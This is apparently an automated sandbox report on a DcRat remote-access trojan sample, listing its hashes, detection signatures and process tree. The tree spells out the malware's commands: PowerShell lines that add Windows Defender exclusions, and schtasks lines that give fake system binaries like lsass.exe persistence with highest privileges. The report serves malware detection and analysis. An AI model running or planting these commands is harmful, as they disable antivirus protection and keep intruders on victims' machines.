Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/03/2025, 20:31 UTC

General

  • Target

    855deb7775f714f1fc46d29fea8008d7.exe

  • Size

    1.6MB

  • MD5

    855deb7775f714f1fc46d29fea8008d7

  • SHA1

    421d56096458fc456190f7c8d13fa3435c051264

  • SHA256

    795cdb953a299acec277e31a6c97b38acdc44dfca7a2ce6bda2785a48bdfafdf

  • SHA512

    7fd5597d07dd4597262a6122c3b165b0624d99ee9d222f448e2161c07bcef791a08be95bf52eb4cf37c8105e53855bf96d1bf026d887cb3ef85d132c07b40d99

  • SSDEEP

    24576:Ksm8JijftfWIqZpyh/X6bSmV2GKz1oncoiF9GFwUvpHk3tSfEybcswrJ4gOEGEk:KD8Jijt+xpS/ekYmLGdhEAf7bCcjE

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 51 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 7 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 14 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 14 IoCs
  • Drops file in Program Files directory 30 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 14 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 51 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 33 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\855deb7775f714f1fc46d29fea8008d7.exe
    "C:\Users\Admin\AppData\Local\Temp\855deb7775f714f1fc46d29fea8008d7.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4320
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\855deb7775f714f1fc46d29fea8008d7.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1652
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Templates\RuntimeBroker.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1860
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\explorer.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3180
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Oracle\Java\javapath\sppsvc.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4684
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\dfe2e59cddd00040f555dab607351a1d\lsass.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1504
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\jdk-1.8\bin\StartMenuExperienceHost.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2944
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\d9c22b4eaa3c0b9c12c7\sysmon.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2712
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\lsass.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1604
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1508
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\dfe2e59cddd00040f555dab607351a1d\fontdrvhost.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\d9c22b4eaa3c0b9c12c7\upfc.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2188
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\dfe2e59cddd00040f555dab607351a1d\OfficeClickToRun.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4484
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Mail\SearchApp.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3956
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\dwm.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1324
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\d9c22b4eaa3c0b9c12c7\backgroundTaskHost.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4452
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\System.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:452
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Updates\Download\PackageFiles\System.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2020
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\dfe2e59cddd00040f555dab607351a1d\spoolsv.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2228
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YGXBwQcNNN.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4604
      • C:\Windows\system32\w32tm.exe
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        3⤵
          PID:5960
        • C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe
          "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5848
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\249b6445-d9d3-4c6f-b0f4-81a0b3d68bc1.vbs"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:5928
            • C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe
              "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5112
              • C:\Windows\System32\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f3d08163-93d6-4d41-924f-ab0bf7bdda79.vbs"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:5116
                • C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe
                  "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe"
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2920
                  • C:\Windows\System32\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31405113-4fea-4cd0-a67e-7e25a4764fcd.vbs"
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:5996
                    • C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe
                      "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe"
                      9⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:5716
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e0890e8b-709d-45ae-9af4-b3520d5b2096.vbs"
                        10⤵
                          PID:1344
                          • C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe
                            "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe"
                            11⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5516
                            • C:\Windows\System32\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ec3c489d-e578-4661-9236-242a54b4245e.vbs"
                              12⤵
                                PID:2852
                                • C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe
                                  "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe"
                                  13⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Modifies registry class
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4604
                                  • C:\Windows\System32\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\08a79e30-b6bb-42d6-b88b-6883dfbc316d.vbs"
                                    14⤵
                                      PID:5880
                                      • C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe
                                        "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe"
                                        15⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • Modifies registry class
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5148
                                        • C:\Windows\System32\WScript.exe
                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\48224483-4190-4189-9c7d-56dc9ac946a6.vbs"
                                          16⤵
                                            PID:5436
                                            • C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe
                                              "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe"
                                              17⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              • Modifies registry class
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5400
                                              • C:\Windows\System32\WScript.exe
                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fafec8d3-a27e-4649-83d5-59f2acc8e4e5.vbs"
                                                18⤵
                                                  PID:4300
                                                  • C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe
                                                    "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe"
                                                    19⤵
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • Modifies registry class
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1836
                                                    • C:\Windows\System32\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a2518299-e856-49d8-9528-feb297486c5b.vbs"
                                                      20⤵
                                                        PID:6064
                                                        • C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe
                                                          "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe"
                                                          21⤵
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          • Modifies registry class
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4564
                                                          • C:\Windows\System32\WScript.exe
                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\96dcb0b1-2868-493a-a0d3-627040df2c28.vbs"
                                                            22⤵
                                                              PID:1972
                                                              • C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe
                                                                "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe"
                                                                23⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                • Modifies registry class
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5360
                                                                • C:\Windows\System32\WScript.exe
                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1a1cd58f-3f12-4152-8a68-679e227f2b47.vbs"
                                                                  24⤵
                                                                    PID:1384
                                                                    • C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe
                                                                      "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe"
                                                                      25⤵
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      • Modifies registry class
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4376
                                                                      • C:\Windows\System32\WScript.exe
                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a463b1af-1950-4516-8933-017a478e69a2.vbs"
                                                                        26⤵
                                                                          PID:5516
                                                                          • C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe
                                                                            "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe"
                                                                            27⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • Modifies registry class
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:5888
                                                                            • C:\Windows\System32\WScript.exe
                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4d27e26c-f04e-49bb-819c-2d3bb08db808.vbs"
                                                                              28⤵
                                                                                PID:5588
                                                                                • C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe
                                                                                  "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe"
                                                                                  29⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4652
                                                                              • C:\Windows\System32\WScript.exe
                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\17ce8fe4-793b-462d-b602-dbf227fc84e6.vbs"
                                                                                28⤵
                                                                                  PID:3224
                                                                            • C:\Windows\System32\WScript.exe
                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b20b248-0a09-4b73-a73e-f98f4989fa26.vbs"
                                                                              26⤵
                                                                                PID:2340
                                                                          • C:\Windows\System32\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23e8d58f-f983-43b4-8b0a-4016eddc3e88.vbs"
                                                                            24⤵
                                                                              PID:5296
                                                                        • C:\Windows\System32\WScript.exe
                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a4dc8639-d369-4ea1-8452-61c8c6a730f9.vbs"
                                                                          22⤵
                                                                            PID:6000
                                                                      • C:\Windows\System32\WScript.exe
                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\abc6e133-acdf-4129-8798-0f606aa2ca76.vbs"
                                                                        20⤵
                                                                          PID:1392
                                                                    • C:\Windows\System32\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\94602f1a-7eca-4235-914b-f8ebfb4d1e76.vbs"
                                                                      18⤵
                                                                        PID:6072
                                                                  • C:\Windows\System32\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9784eaa4-7b35-4a32-9d3e-2fde483fc0fd.vbs"
                                                                    16⤵
                                                                      PID:4008
                                                                • C:\Windows\System32\WScript.exe
                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\91de019b-3c18-46db-9389-4efcf10a256b.vbs"
                                                                  14⤵
                                                                    PID:5680
                                                              • C:\Windows\System32\WScript.exe
                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fe30acf9-2d4a-4b85-9955-e6604a6d6388.vbs"
                                                                12⤵
                                                                  PID:2416
                                                            • C:\Windows\System32\WScript.exe
                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7720ad24-c416-4899-8254-93ce4dcbe89a.vbs"
                                                              10⤵
                                                                PID:3092
                                                          • C:\Windows\System32\WScript.exe
                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\80e95816-7104-4834-9e6a-5ec65536e09f.vbs"
                                                            8⤵
                                                              PID:2952
                                                        • C:\Windows\System32\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16558f45-ad1f-4f54-819e-a905a125e4f2.vbs"
                                                          6⤵
                                                            PID:2464
                                                      • C:\Windows\System32\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dea7f5cd-8338-4183-a2ff-cec644b69b72.vbs"
                                                        4⤵
                                                          PID:5432
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Templates\RuntimeBroker.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4084
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\All Users\Templates\RuntimeBroker.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:5048
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Templates\RuntimeBroker.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4608
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\explorer.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4428
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\explorer.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:3668
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\explorer.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2012
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Common Files\Oracle\Java\javapath\sppsvc.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4056
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Oracle\Java\javapath\sppsvc.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4412
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\Oracle\Java\javapath\sppsvc.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4016
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\dfe2e59cddd00040f555dab607351a1d\lsass.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4132
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\dfe2e59cddd00040f555dab607351a1d\lsass.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:5072
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\dfe2e59cddd00040f555dab607351a1d\lsass.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:3196
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Java\jdk-1.8\bin\StartMenuExperienceHost.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:368
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files\Java\jdk-1.8\bin\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2284
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Java\jdk-1.8\bin\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2692
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 11 /tr "'C:\d9c22b4eaa3c0b9c12c7\sysmon.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1064
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\d9c22b4eaa3c0b9c12c7\sysmon.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1296
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 14 /tr "'C:\d9c22b4eaa3c0b9c12c7\sysmon.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4660
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:320
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4948
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:3692
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4868
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2440
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2884
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\dfe2e59cddd00040f555dab607351a1d\fontdrvhost.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:664
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\dfe2e59cddd00040f555dab607351a1d\fontdrvhost.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:3920
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\dfe2e59cddd00040f555dab607351a1d\fontdrvhost.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:3516
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\d9c22b4eaa3c0b9c12c7\upfc.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4988
